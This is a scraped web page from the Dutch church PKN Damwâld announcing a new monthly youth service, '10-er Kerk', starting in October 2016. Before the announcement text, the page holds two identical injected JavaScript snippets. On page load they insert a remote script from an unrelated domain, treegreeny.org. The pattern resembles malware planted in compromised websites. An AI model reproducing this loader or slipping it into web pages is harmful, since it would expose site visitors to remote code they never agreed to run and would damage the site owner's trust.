;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NIEUW! Nevendienst voor de jeugd op het voortgezet onderwijs. - PKN Damwâld

NIEUW! Nevendienst voor de jeugd op het voortgezet onderwijs.

Gepubliceerd op: woensdag 6 juli 2016

NIEUW! Nevendienst voor de jeugd op het voortgezet onderwijs.

 

Met ingang van het nieuwe seizoen gaan we starten met 10-er Kerk, een vervolg op de Bernetsjerke.

We beginnen op 2 oktober as. Jullie zijn dan eerst welkom in de kerk. Tegelijk met de kinderen van de Bernetsjerke gaan jullie uit de kerk en gaan we naar het Honk. Daar blijven we de hele tijd (we komen dus niet terug in de kerk).

Wat gaan we doen? We starten met het thema: Een nieuw begin!

Er is ruimte voor gezellig samen zijn, gesprek, met elkaar nadenken en een spel. Uiteraard zorgen we voor wat drinken en iets erbij.

De bedoeling is om één keer per maand bij elkaar te komen. We hebben enthousiaste leiding gevonden en hopen dat jullie het leuk gaan vinden. Hoe het verloopt is onbekend, maar we hopen natuurlijk dat het een succes wordt, zodat we er in de toekomst mee door kunnen gaan!

Dus: jij komt toch ook?!

Ben je al nieuwsgierig? Er bestaat een Instagram account die je kunt herkennen aan ons logo, dus volg ons!

Heb je nog vragen of ideeën, die kun je ons mailen via tienerkerkdamwald@gmail.com

YO!, see you.